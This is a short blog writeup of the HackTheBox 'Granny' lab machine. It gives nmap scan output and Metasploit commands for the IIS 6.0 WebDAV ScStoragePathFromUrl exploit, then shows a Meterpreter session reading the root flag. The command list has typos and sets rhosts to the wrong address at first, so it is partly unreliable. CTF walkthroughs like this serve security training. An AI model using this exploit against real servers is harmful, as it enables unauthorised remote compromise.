Posted inCTF

Hackthebox Granny writeup

April 17, 2020No Comments
Hackthebox Granny writeup
Tweet
Share
Share
Pin
0 Shares
0
(0)
Hackthebox Granny writeup

Commands used

1-nmap -sC -v 10.10.10.15
2-msfconsle
3-use exploit/windows/iis/iis_webdav_scstoragepathfromurl
4-set targeturi /_vti_bin
5-set rhosts 10.10.14.20
5-set lhost your_ip
6-set lport 1234
7-run

Steps involved 

Steps invloved
 1-Port Scanning
2-Searching exploit for IIS 6.0
3-Exploiting IIS with metasploit

Port scan

Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-16 23:06 EDT
 NSE: Loaded 119 scripts for scanning.
 NSE: Script Pre-scanning.
 Initiating NSE at 23:06
 Completed NSE at 23:06, 0.00s elapsed
 Initiating NSE at 23:06
 Completed NSE at 23:06, 0.00s elapsed
 Initiating Ping Scan at 23:06
 Scanning 10.10.10.15 [4 ports]
 Completed Ping Scan at 23:06, 0.76s elapsed (1 total hosts)
 Initiating Parallel DNS resolution of 1 host. at 23:06
 Completed Parallel DNS resolution of 1 host. at 23:06, 0.06s elapsed
 Initiating SYN Stealth Scan at 23:06
 Scanning 10.10.10.15 [1000 ports]
 Discovered open port 80/tcp on 10.10.10.15
 SYN Stealth Scan Timing: About 28.50% done; ETC: 23:08 (0:01:20 remaining)
 Completed SYN Stealth Scan at 23:07, 50.28s elapsed (1000 total ports)
 NSE: Script scanning 10.10.10.15.
 Initiating NSE at 23:07
 Completed NSE at 23:07, 8.96s elapsed
 Initiating NSE at 23:07
 Completed NSE at 23:07, 0.00s elapsed
 Nmap scan report for 10.10.10.15
 Host is up (0.44s latency).
 Not shown: 999 filtered ports
 PORT   STATE SERVICE
 80/tcp open  http
 | http-methods: 
 |   Supported Methods: OPTIONS TRACE GET HEAD DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT POST
 |_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
 |http-title: Under Construction | http-webdav-scan:  |   WebDAV type: Unkown |   Server Date: Fri, 17 Apr 2020 03:10:52 GMT |   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK |   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH |  Server Type: Microsoft-IIS/6.0
 NSE: Script Post-scanning.
 Initiating NSE at 23:07
 Completed NSE at 23:07, 0.00s elapsed
 Initiating NSE at 23:07
 Completed NSE at 23:07, 0.00s elapsed
 Read data files from: /usr/bin/../share/nmap
 Nmap done: 1 IP address (1 host up) scanned in 61.31 seconds
            Raw packets sent: 2020 (88.856KB) | Rcvd: 27 (1.236KB)

It is also having IIS 6 open like the Grandpa So i used it directly.You can see Grandpa writeup for that.

I found it same as grandpa machine.

Hackthebox Granny writeup
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.15
 rhosts => 10.10.10.15
 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set targeturi /_vti_bin
 targeturi => /_vti_bin
 msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run
Hackthebox Granny writeup

And got root directly.

meterpreter > cd Desktop
 meterpreter > dir
 Listing: C:\Documents and Settings\Administrator\Desktop
 Mode              Size  Type  Last modified              Name
 ----              ----  ----  -------------              ----
 100444/r--r--r--  32    fil   2017-04-12 15:17:07 -0400  root.txt
 meterpreter > type root.txt
 [-] Unknown command: type.
 meterpreter > cat root.txt
 aa4bee*********************9

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Post Views: 130
Tags:
Last updated on April 17, 2020

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *